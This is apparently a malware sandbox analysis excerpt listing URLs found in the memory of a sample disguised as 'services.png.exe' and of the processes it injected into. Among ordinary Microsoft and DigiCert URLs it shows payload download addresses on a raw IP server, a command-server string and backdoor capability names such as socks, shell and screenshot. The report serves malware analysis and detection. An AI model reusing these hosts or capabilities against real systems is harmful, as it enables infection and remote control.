                        Source: services.png.exe, services.png.exe, 00000000.00000002.2171781778.0000000002B50000.00000004.00000020.00020000.00000000.sdmp, services.png.exe, 00000000.00000002.2171239086.0000000002810000.00000040.00000400.00020000.00000000.sdmp, services.png.exe, 00000000.00000002.2167883548.0000000000401000.00000020.00000001.01000000.00000003.sdmp, nyheukpo.exe, nyheukpo.exe, 00000001.00000003.2766629012.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2579296491.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.2922936744.0000000000401000.00000020.00000001.01000000.00000006.sdmp, nyheukpo.exe, 00000001.00000003.2282267263.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2627357615.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.1732075330.0000000002221000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2745411292.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, sihost.exe, 00000002.00000003.1732150846.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, sihost.exe, 00000002.00000000.1730300340.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1733775300.0000000000910000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732249367.0000000000910000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1736960492.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000000.1733891566.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, ctfmon.exe, 00000005.00000000.1737083449.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, ctfmon.exe, 00000005.00000003.1738779911.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.1762790225.000000000C350000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:%u/
                        Source: services.png.exe, 00000000.00000002.2171781778.0000000002B50000.00000004.00000020.00020000.00000000.sdmp, services.png.exe, 00000000.00000002.2171239086.0000000002810000.00000040.00000400.00020000.00000000.sdmp, services.png.exe, 00000000.00000002.2167883548.0000000000401000.00000020.00000001.01000000.00000003.sdmp, nyheukpo.exe, 00000001.00000003.2766629012.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2579296491.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.2922936744.0000000000401000.00000020.00000001.01000000.00000006.sdmp, nyheukpo.exe, 00000001.00000003.2282267263.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2627357615.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.1732075330.0000000002221000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2745411292.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, sihost.exe, 00000002.00000003.1732150846.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, sihost.exe, 00000002.00000000.1730300340.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1733775300.0000000000910000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732249367.0000000000910000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1736960492.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000000.1733891566.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, ctfmon.exe, 00000005.00000000.1737083449.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, ctfmon.exe, 00000005.00000003.1738779911.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.1762790225.000000000C350000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1754241470.000000000C350000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000000.1762934350.0000000000D40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:%u//%s/%s%sX-Type:
                        Source: nyheukpo.exe, 00000001.00000002.2962238651.0000000002223000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.21.41.165:5555/SearchUI.exe
                        Source: nyheukpo.exe, 00000001.00000002.2962238651.0000000002223000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.21.41.165:5555/SearchUI.exe)
                        Source: nyheukpo.exe, 00000001.00000002.2962238651.0000000002223000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.21.41.165:5555/SearchUI.exeK
                        Source: nyheukpo.exe, 00000001.00000002.2962238651.0000000002223000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.21.41.165:5555/SearchUI.exeZ
                        Source: nyheukpo.exe, 00000001.00000003.2625696729.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.2946984336.0000000000704000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2626159031.0000000000703000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.21.41.165:5555/SearchUI.exed
                        Source: nyheukpo.exe, 00000001.00000003.2625696729.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.2946984336.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2626703014.000000000072B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.21.41.165:5555/SearchUI.exekg
                        Source: nyheukpo.exe, 00000001.00000003.2507629555.00000000006F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.21.41.165:5555/UIServices.exe
                        Source: nyheukpo.exe, 00000001.00000003.2745628662.00000000040FA000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2884030951.00000000040FA000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.3018778650.00000000040FA000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2579575354.00000000040FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.21.41.165:5555/UIServices.exe)
                        Source: nyheukpo.exe, 00000001.00000003.2507629555.00000000006F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.21.41.165:5555/UIServices.exe5
                        Source: nyheukpo.exe, 00000001.00000003.2507629555.00000000006F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.21.41.165:5555/UIServices.exe:
                        Source: nyheukpo.exe, 00000001.00000003.2507855708.000000000072A000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2577799127.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2578230111.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2589353925.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2589820943.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2507629555.00000000006F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.21.41.165:5555/UIServices.exeMicrosoft
                        Source: nyheukpo.exe, 00000001.00000002.2962238651.0000000002223000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.21.41.165:5555/UIServices.exed
                        Source: nyheukpo.exe, 00000001.00000003.2745628662.00000000040FA000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2884030951.00000000040FA000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.3018778650.00000000040FA000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2579575354.00000000040FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.21.41.165:5555/UIServices.exep
                        Source: nyheukpo.exe, 00000001.00000003.2507629555.00000000006F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.21.41.165:5555/UIServices.exex
                        Source: nyheukpo.exe, 00000001.00000003.2577799127.00000000006F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.21.41.165:5555/smbhost.exe
                        Source: nyheukpo.exe, 00000001.00000003.2577799127.00000000006F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.21.41.165:5555/smbhost.exe-
                        Source: nyheukpo.exe, 00000001.00000003.2577799127.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2578230111.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2589353925.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2589820943.000000000072B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.21.41.165:5555/smbhost.exe32
                        Source: nyheukpo.exe, 00000001.00000003.2577799127.00000000006F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.21.41.165:5555/smbhost.exe:5555/smbhost.exe
                        Source: nyheukpo.exe, 00000001.00000003.2625696729.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.2946984336.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2626703014.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2577799127.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2578230111.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2589353925.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2589820943.000000000072B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.21.41.165:5555/smbhost.exeF
                        Source: nyheukpo.exe, 00000001.00000002.3018778650.00000000040E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.21.41.165:5555/smbhost.exectur
                        Source: nyheukpo.exe, 00000001.00000003.2577799127.00000000006F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.21.41.165:5555/smbhost.exeer
                        Source: nyheukpo.exe, 00000001.00000003.2577799127.00000000006F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.21.41.165:5555/smbhost.exeerO
                        Source: nyheukpo.exe, 00000001.00000002.2962238651.0000000002223000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.21.41.165:5555/smbhost.exeo
                        Source: nyheukpo.exe, 00000001.00000003.2577799127.00000000006F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.21.41.165:5555/smbhost.exep
                        Source: nyheukpo.exe, 00000001.00000002.2962238651.0000000002223000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.21.41.165:5555/smbhost.exey
                        Source: explorer.exe, 00000006.00000000.1750623185.0000000009837000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3089421963.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3047788765.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                        Source: svchost.exe, 00000004.00000000.1734893699.0000019E29FC7000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000000.1734907656.0000019E29FCA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3016773991.0000019E29FC7000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3018089478.0000019E29FCA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
                        Source: explorer.exe, 00000006.00000000.1750623185.0000000009837000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3089421963.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3047788765.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                        Source: svchost.exe, 00000004.00000000.1734893699.0000019E29FC7000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000000.1734907656.0000019E29FCA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3016773991.0000019E29FC7000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3018089478.0000019E29FCA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
                        Source: SearchApp.exe, 0000000A.00000000.1812304098.0000024B4247F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                        Source: explorer.exe, 00000006.00000000.1750623185.0000000009837000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3089421963.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3047788765.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                        Source: svchost.exe, 00000004.00000000.1734893699.0000019E29FC7000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000000.1734907656.0000019E29FCA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3016773991.0000019E29FC7000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3018089478.0000019E29FCA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
                        Source: svchost.exe, 00000004.00000000.1734893699.0000019E29FC7000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000000.1734907656.0000019E29FCA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3016773991.0000019E29FC7000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3018089478.0000019E29FCA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1750623185.0000000009837000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3089421963.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3047788765.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                        Source: SearchApp.exe, 0000000A.00000000.1812304098.0000024B4247F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                        Source: explorer.exe, 00000006.00000002.3047788765.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                        Source: SearchApp.exe, 0000000A.00000000.1812304098.0000024B4247F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                        Source: nyheukpo.exe, 00000001.00000002.3018778650.00000000040D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPage
                        Source: explorer.exe, 00000006.00000002.3047788765.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
                        Source: explorer.exe, 00000006.00000002.3047788765.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.micr
                        Source: explorer.exe, 00000006.00000000.1749104971.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.3100896455.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.3082707450.0000000008720000.00000002.00000001.00040000.00000000.sdmp, RuntimeBroker.exe, 00000009.00000002.3008868601.000001ECFC470000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                        Source: nyheukpo.exe, 00000001.00000003.2181887191.000000000222D000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2627714144.00000000040E5000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2466982292.00000000040E3000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2579575354.00000000040E3000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.2962238651.0000000002223000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2194610287.0000000002227000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2181579380.0000000002225000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2181692278.000000000222D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://staa.com/
                        Source: nyheukpo.exe, 00000001.00000003.2181887191.000000000222D000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2627714144.00000000040E5000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2466982292.00000000040E3000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2579575354.00000000040E3000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.2962238651.0000000002223000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2194610287.0000000002227000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2181579380.0000000002225000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2181692278.000000000222D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://staa.com/cmdserver%COMMANDSERVER%
                        Source: nyheukpo.exe, 00000001.00000002.3018778650.00000000040D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://upx.sourceforge.net.
                        Source: explorer.exe, 00000006.00000000.1754346669.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3118529688.000000000C964000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                        Source: nyheukpo.exe, 00000001.00000002.3018778650.00000000040D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ctuser.net;
                        Source: services.png.exe, services.png.exe, 00000000.00000002.2171781778.0000000002B50000.00000004.00000020.00020000.00000000.sdmp, services.png.exe, 00000000.00000002.2171239086.0000000002810000.00000040.00000400.00020000.00000000.sdmp, services.png.exe, 00000000.00000002.2167883548.0000000000401000.00000020.00000001.01000000.00000003.sdmp, nyheukpo.exe, nyheukpo.exe, 00000001.00000003.2766629012.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2579296491.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.2922936744.0000000000401000.00000020.00000001.01000000.00000006.sdmp, nyheukpo.exe, 00000001.00000003.2282267263.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2589353925.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2627357615.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2625696729.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.1732075330.0000000002221000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2507629555.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.2935128249.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2745411292.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2577799127.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, sihost.exe, 00000002.00000003.1732150846.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, sihost.exe, 00000002.00000000.1730300340.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1733775300.0000000000910000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732249367.0000000000910000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/webhp
                        Source: nyheukpo.exe, 00000001.00000003.2589353925.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2625696729.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2507629555.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.2935128249.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2577799127.00000000006F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/webhpN
                        Source: services.png.exe, 00000000.00000002.2171781778.0000000002B50000.00000004.00000020.00020000.00000000.sdmp, services.png.exe, 00000000.00000002.2171239086.0000000002810000.00000040.00000400.00020000.00000000.sdmp, services.png.exe, 00000000.00000002.2167883548.0000000000401000.00000020.00000001.01000000.00000003.sdmp, nyheukpo.exe, 00000001.00000003.2766629012.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2579296491.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.2922936744.0000000000401000.00000020.00000001.01000000.00000006.sdmp, nyheukpo.exe, 00000001.00000003.2282267263.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2627357615.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.1732075330.0000000002221000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2745411292.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, sihost.exe, 00000002.00000003.1732150846.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, sihost.exe, 00000002.00000000.1730300340.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1733775300.0000000000910000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732249367.0000000000910000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1736960492.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000000.1733891566.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, ctfmon.exe, 00000005.00000000.1737083449.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, ctfmon.exe, 00000005.00000003.1738779911.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.1762790225.000000000C350000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1754241470.000000000C350000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000000.1762934350.0000000000D40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/webhpbcsocksshellpowershellscreenshotGlobal
                        Source: svchost.exe, 00000003.00000000.1732670803.00000151A4A65000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2952506913.00000151A4A65000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                        Source: svchost.exe, 00000003.00000000.1732670803.00000151A4A65000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2952506913.00000151A4A65000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://%s.xboxlive.com
                        Source: svchost.exe, 00000003.00000002.2956326778.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2950472526.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732650259.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732710867.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com
                        Source: explorer.exe, 00000006.00000002.3133456773.000000000CA7C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
                        Source: explorer.exe, 00000006.00000000.1754346669.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3118529688.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
                        Source: svchost.exe, 00000003.00000002.2950472526.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732650259.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.comt
                        Source: explorer.exe, 00000006.00000002.3047788765.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
                        Source: explorer.exe, 00000006.00000002.3047788765.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
                        Source: explorer.exe, 00000006.00000002.3133456773.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1754346669.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                        Source: SearchApp.exe, 0000000A.00000000.1797938100.0000024340CDC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/news/feed?ocid=winsearch&market=en-us&query=good%20news&apikey=uvobH5fEn1uz1xwZ5
                        Source: explorer.exe, 00000006.00000000.1740112568.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2933946089.0000000001240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                        Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
                        Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
                        Source: TextInputHost.exe, 00000010.00000002.3022957093.0000015545B2B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
                        Source: explorer.exe, 00000006.00000002.3089421963.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1750623185.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
                        Source: svchost.exe, 00000003.00000002.2954582043.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2950472526.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732691844.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732650259.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com
                        Source: svchost.exe, 00000003.00000002.2950472526.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732650259.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com/v1/assets
                        Source: svchost.exe, 00000003.00000002.2956326778.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2950472526.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732650259.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732710867.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com/v1/assets/$batch
                        Source: svchost.exe, 00000003.00000002.2954582043.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732691844.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.comer
